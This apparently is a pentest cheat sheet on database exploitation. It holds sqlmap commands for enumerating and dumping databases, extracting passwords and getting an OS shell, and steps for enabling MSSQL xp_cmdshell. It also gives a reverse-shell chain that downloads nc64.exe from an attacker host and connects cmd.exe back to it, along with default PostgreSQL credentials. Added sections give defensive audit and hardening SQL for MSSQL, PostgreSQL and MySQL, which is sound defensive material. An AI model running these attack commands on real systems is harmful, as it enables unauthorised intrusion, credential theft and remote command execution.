Database-Exploitation

Table of contents

⭕ SQLMAP
⭕ Access to a database
⭕ Operate with database management system

⭕ SQLMAP

➤ Specify a DBMS
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbms Oracle


➤ Enumerate the database names
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs


➤ Enumerate the tables
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} --tables


➤ Enumerate the columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} --columns


➤ Dump columns
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D {DATABASE} -T {TABLE} -C {COLUMN01,COLUMN02,...} --dump


➤ Get the operating system command shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-shell
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --os-cmd=whoami


➤ Try to detect and dump the passwords
sqlmap -u "http://10.0.0.1/test?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --passwords

⭕ Access to a database

🔻SQSH - Connect to a database

sqsh -U <user> -P <password> -S <ip:port> -D <database>
ex: sqsh -U sa -P badpassword -S 10.0.0.1:1433 -D bankdb

⭕ Operate with database management system

🔻MSSQL

Activate xp_cmdshell

Error: "SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online."

1> EXEC SP_CONFIGURE 'show advanced options',1
2> reconfigure
3> go

1> EXEC SP_CONFIGURE 'xp_cmdshell',1
2> reconfigure
3> go

Execute commands through xp_cmdshell

1> xp_cmdshell 'whoami'
2> go

Reverse shell through xp_cmdshell

➤ Create a netcat listener
nc -lvp 443

➤ Serve the reverse shell binary (here nc64.exe) from an HTTP server on the attacking machine
python3 -m http.server

➤ On the database, upload the file from the http server
1> exec xp_cmdshell 'powershell.exe wget http://192.168.119.194:8000/nc64.exe -OutFile c:\Users\Public\nc64.exe'
2> go

➤ Execute the script
1> xp_cmdshell 'c:\Users\Public\nc64.exe -e cmd.exe 192.168.119.194 443'
2> go
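The steps above enable xp_cmdshell and run a command through it. The following T-SQL is an added example, not part of the Kiosec/Database-Exploitation repository: it is the audit and hardening counterpart a defender runs on an instance, checking whether xp_cmdshell is enabled, which logins hold the sysadmin role that sp_configure requires, turning the option back off, and reading the configuration-change entries the error log keeps. It assumes a sysadmin connection and uses only standard SQL Server catalog views and procedures.

```sql
-- Added example (not from the repository): audit and re-disable xp_cmdshell.
-- Run as sysadmin on the instance being defended.

-- 1. Current state of the two options toggled in the section above.
--    value_in_use = 1 for xp_cmdshell means OS command execution is open.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Who could have toggled it: members of the sysadmin server role.
--    An application login in this list is the precondition for sqlmap --os-shell.
SELECT p.name AS login_name, p.type_desc, p.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS p ON p.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY p.name;

-- 3. Turn the option off again and hide the advanced options.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Every sp_configure change is written to the SQL Server error log as
--    "Configuration option '...' changed from X to Y"; the current log (0)
--    filtered on that text shows when and by which session it happened.
EXEC xp_readerrorlog 0, 1, N'Configuration option';
```

The query in step 2 is the one worth scheduling: an application account that is a sysadmin can always re-enable xp_cmdshell, so removing the membership matters more than the value of the option itself.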

🔻POSTGRESQL

Default user/password

User      Password
postgres  postgres

Connect to a local PostgreSQL instance

kiosec@cyberlab:/home$ psql -h 127.0.0.1 -U postgres
Password for user postgres: ******

psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#

Connect to a remote PostgreSQL instance

kiosec@cyberlab:/home$ psql -h 10.0.0.1 -p 5437 -U postgres
Password for user postgres: ******

psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#

List all the available databases

postgres=# \list
WARNING: terminal is not fully functional
Press RETURN to continue 

                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-------------+----------+----------+-------------+-------------+---------------------
 testDB      | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
(END)q

Connect to the database by utilizing the \connect directive

Important note: psql shows long results in a pager; press "q" to leave it and return to the main prompt (postgres=#) before typing the next command.

postgres=# \connect testDB
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "testDB" as user "postgres".
testDB=#

List all database tables

testDB=# \dt
WARNING: terminal is not fully functional
Press RETURN to continue 

         List of relations
 Schema | Name  | Type  |  Owner   
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)

(END)q
testDB=# 

View the content of a table

testDB=# select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue 

   name  |                           password                           | role
---------+--------------------------------------------------------------+------
TestUser | $2a$10$E/Vcd9ecflmPud************************NVNV3Mm6eH58zim | User
Admin    | $2a$10$SpKYdHLB0FOaT7************************b2MZib3H9kVO8dm | Admin
(2 rows)
(END)q

Disconnect from PostgreSQL

testDB=# \q
could not save history to file "/home/app/.psql_history": No such file or directory
kiosec@cyberlab:/home$
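The psql session above relies on meta-commands (\list, \dt) and on the default postgres/postgres credential. As an added example that is not part of the repository, the SQL below does the same listing from any client (no pager involved), then runs the checks a defender performs after finding such a login: which roles can log in and are superusers, how their passwords are hashed, and from which addresses the server accepts them. It assumes a superuser connection to a PostgreSQL 10 or newer instance; the catalog names are standard, the new password is a placeholder.

```sql
-- Added example (not from the repository): SQL equivalents of \list and \dt,
-- followed by role, password-hash and pg_hba audits.

-- \list : databases, excluding templates
SELECT d.datname,
       pg_get_userbyid(d.datdba)      AS owner,
       pg_encoding_to_char(d.encoding) AS encoding,
       d.datcollate, d.datctype
FROM pg_database AS d
WHERE NOT d.datistemplate
ORDER BY d.datname;

-- \dt : user tables in the current database
SELECT schemaname, tablename, tableowner
FROM pg_tables
WHERE schemaname NOT IN ('pg_catalog', 'information_schema')
ORDER BY schemaname, tablename;

-- Audit 1: login-capable roles, superusers first.
SELECT rolname, rolsuper, rolcreaterole, rolvaliduntil
FROM pg_roles
WHERE rolcanlogin
ORDER BY rolsuper DESC, rolname;

-- Audit 2: password storage. 'md5' is the legacy format; new passwords should
-- be hashed with SCRAM-SHA-256 (password_encryption = scram-sha-256).
SHOW password_encryption;
SELECT rolname,
       CASE WHEN rolpassword LIKE 'SCRAM-SHA-256$%' THEN 'scram-sha-256'
            WHEN rolpassword LIKE 'md5%'            THEN 'md5'
            WHEN rolpassword IS NULL                THEN 'none'
            ELSE 'other' END AS hash_type
FROM pg_authid
WHERE rolcanlogin
ORDER BY rolname;

-- Fix: rotate the default credential (placeholder value).
ALTER ROLE postgres WITH PASSWORD 'NEW_STRONG_PASSWORD_PLACEHOLDER';

-- Audit 3: the effective pg_hba.conf rules, i.e. which users may connect from
-- where and with which method ('trust' rows need no password at all).
SELECT line_number, type, database, user_name, address, auth_method, error
FROM pg_hba_file_rules
ORDER BY line_number;
```

Rows in the last query with auth_method 'trust' or 'md5' on a non-local address are the ones to change; after editing pg_hba.conf, `SELECT pg_reload_conf();` applies it without a restart.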

🔻MYSQL

Connect to a local mysql instance

mysql -u username -h 127.0.0.1 -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
<...>

List all databases

mysql> show databases;

List tables from a database:

USE <database_name>;
SHOW TABLES;
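The sqlmap options in the first section (--dbs, --tables, --columns, --passwords, --os-shell) and the SHOW statements just above all resolve to catalog reads that succeed only if the connecting account is allowed to perform them. The MySQL script below is an added example, not part of the repository: it shows the information_schema queries those options rely on, audits the account table for default credentials and for the FILE and SUPER privileges that turn an injection into file writes and server control, and creates a least-privilege application account. It assumes MySQL 8, an application schema named appdb and accounts named webapp and legacyapp, all placeholders.

```sql
-- Added example (not from the repository): what enumeration reads, and the
-- least-privilege account that limits it. Run as a DBA on MySQL 8.

-- --dbs / --tables / --columns walk information_schema; an injected query sees
-- only the schemas the connecting account has privileges on.
SELECT schema_name FROM information_schema.schemata;
SELECT table_name   FROM information_schema.tables  WHERE table_schema = 'appdb';
SELECT column_name, data_type
FROM information_schema.columns
WHERE table_schema = 'appdb' AND table_name = 'users';

-- --passwords reads mysql.user; only accounts with SELECT on mysql.* can.
-- empty_password = 1 is a default credential; File_priv = 'Y' allows
-- SELECT ... INTO OUTFILE, the usual MySQL route to command execution.
SELECT User, Host, plugin,
       authentication_string = '' AS empty_password,
       File_priv, Super_priv
FROM mysql.user
ORDER BY File_priv DESC, Super_priv DESC, User;

-- An empty secure_file_priv means file writes are not confined to one directory.
SHOW VARIABLES LIKE 'secure_file_priv';

-- Hardened application account: DML on its own schema from the app subnet only,
-- no FILE, no SUPER, no access to mysql.* (placeholder names and password).
CREATE USER 'webapp'@'10.0.0.%' IDENTIFIED BY 'APP_PASSWORD_PLACEHOLDER';
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'webapp'@'10.0.0.%';

-- Existing over-privileged account: strip the global privileges instead.
REVOKE FILE, SUPER ON *.* FROM 'legacyapp'@'%';

-- Verify the result.
SHOW GRANTS FOR 'webapp'@'10.0.0.%';
SHOW GRANTS FOR 'legacyapp'@'%';
```

With the webapp grants above, the --dbs option still lists appdb (the account can see its own schema), but --passwords and the OUTFILE-based --os-shell path fail because mysql.* is unreadable and FILE is absent; that difference is what the audit query on mysql.user makes visible for every account.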

About

Pentest tips on databases
